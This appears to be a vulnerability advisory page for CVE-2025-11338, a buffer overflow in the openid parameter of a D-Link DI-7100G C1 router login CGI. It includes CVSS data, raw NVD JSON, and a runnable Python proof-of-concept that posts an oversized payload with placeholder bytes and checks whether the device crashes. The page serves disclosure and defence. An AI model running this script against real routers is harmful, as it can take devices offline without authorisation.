Security Vulnerability Report
CVE-2025-11338 CVSS 8.8 HIGH

CVE-2025-11338

Published: 2025-10-06 16:15:33
Last Modified: 2025-11-19 21:48:49

Description

A flaw has been found in D-Link DI-7100G C1 up to 20250928. This vulnerability affects the function sub_4C0990 of the file /webchat/login.cgi of the component jhttpd. Executing manipulation of the argument openid can lead to buffer overflow. It is possible to launch the attack remotely. The exploit has been published and may be used.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
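CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Note: the 8.8 score and vector shown here are the record's Secondary CVSS 3.1 assessment. The Primary CVSS 3.1 entry in the raw JSON below is 9.8 CRITICAL (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), which assumes no privileges are required.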

Configurations (Affected Products)

cpe:2.3:o:dlink:di-7100g_c1_firmware:2025-09-28:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dlink:di-7100g_c1:-:*:*:*:*:*:*:* - NOT VULNERABLE
D-Link DI-7100G C1 <= 20250928

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
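#!/usr/bin/env python3
# CVE-2025-11338 - D-Link DI-7100G C1 Buffer Overflow PoC
# Vulnerability: Buffer overflow in sub_4C0990 via openid parameter
# Target: /webchat/login.cgi
#
# NOTE(review): every size, address and filler byte in this script is an
# unverified placeholder (the script says so itself: "adjust based on actual
# binary analysis", "shellcode placeholder"). Its only observable check is
# whether the web service still answers afterwards, so it is at most an
# availability test of the openid handler, not a demonstration of code
# execution.
#
# NOTE(review): for detection, do not build signatures from the filler bytes
# below; they are arbitrary. The stable indicator on this page is the request
# shape: a POST to /webchat/login.cgi whose openid field is far longer than
# any legitimate identifier.

import sys
from struct import pack

import requests

TARGET_HOST = "http://192.168.0.1"
TARGET_PATH = "/webchat/login.cgi"
BUFFER_SIZE = 1024  # Adjust based on actual buffer size


def generate_payload():
    """Build the oversized value that is sent in the ``openid`` field.

    Returns:
        bytes: BUFFER_SIZE filler bytes, a 4-byte little-endian placeholder
        word, 64 bytes of 0x90 and 128 bytes of 0xCC, concatenated in that
        order.
    """
    # Filler up to the assumed buffer size (BUFFER_SIZE is a guess).
    padding = b"A" * BUFFER_SIZE

    # Placeholder word standing in for a saved return address; 0x42424242 is
    # a recognisable marker, not an address taken from the jhttpd binary.
    ret_address = pack("<I", 0x42424242)

    # Placeholder regions; neither holds executable content.
    nop_sled = b"\x90" * 64
    shellcode = b"\xcc" * 128

    return padding + ret_address + nop_sled + shellcode


def exploit(target_url):
    """POST the oversized ``openid`` value, then probe whether the host answers.

    Args:
        target_url: Base URL of the device, e.g. ``http://192.168.0.1``.

    The function only prints its findings; it returns ``None``.
    """
    url = target_url + TARGET_PATH
    payload = generate_payload()

    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0",
    }

    # The openid parameter is the field named in the advisory.
    data = {
        "openid": payload.decode("latin-1"),
        "username": "admin",
        "password": "admin",
    }

    try:
        response = requests.post(url, data=data, headers=headers, timeout=10)
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")
        return

    print(f"[*] Response status: {response.status_code}")
    print(f"[*] Response length: {len(response.content)}")

    # Follow-up liveness probe. Only request-level failures are treated as
    # "unresponsive": the original bare ``except:`` also reported Ctrl-C and
    # programming errors as a success, which produced false positives.
    try:
        check = requests.get(target_url, timeout=5)
    except requests.exceptions.RequestException:
        # A timeout or refused connection shows the service is unreachable,
        # which can equally be a network fault; it does not prove anything
        # beyond a loss of availability.
        print("[+] Target is unresponsive - exploit may have succeeded")
        return

    # The original also compared the status code with 0, which a completed
    # HTTP response never carries, so that dead condition is dropped.
    if check.status_code >= 500:
        print("[+] Target appears to be crashed - exploit may have succeeded")
    else:
        print("[-] Target still responding normally")


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else TARGET_HOST

    print(f"[*] Targeting: {target}")
    print("[*] CVE-2025-11338 - D-Link DI-7100G C1 Buffer Overflow")
    exploit(target)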

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11338", "sourceIdentifier": "[email protected]", "published": "2025-10-06T16:15:33.497", "lastModified": "2025-11-19T21:48:49.203", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in D-Link DI-7100G C1 up to 20250928. This vulnerability affects the function sub_4C0990 of the file /webchat/login.cgi of the component jhttpd. Executing manipulation of the argument openid can lead to buffer overflow. It is possible to launch the attack remotely. The exploit has been published and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", 
"Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": 
"cpe:2.3:o:dlink:di-7100g_c1_firmware:2025-09-28:*:*:*:*:*:*:*", "matchCriteriaId": "7A967144-1055-4FC2-97F7-8E486F6D6D53"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dlink:di-7100g_c1:-:*:*:*:*:*:*:*", "matchCriteriaId": "B661C392-F07F-4BF5-B559-B00693C63E94"}]}]}], "references": [{"url": "https://vuldb.com/?ctiid.327221", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327221", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.664619", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.dlink.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.yuque.com/jh0ng/vmpda6/kggo2ngrcphzvwml", "source": "[email protected]", "tags": ["Permissions Required"]}]}}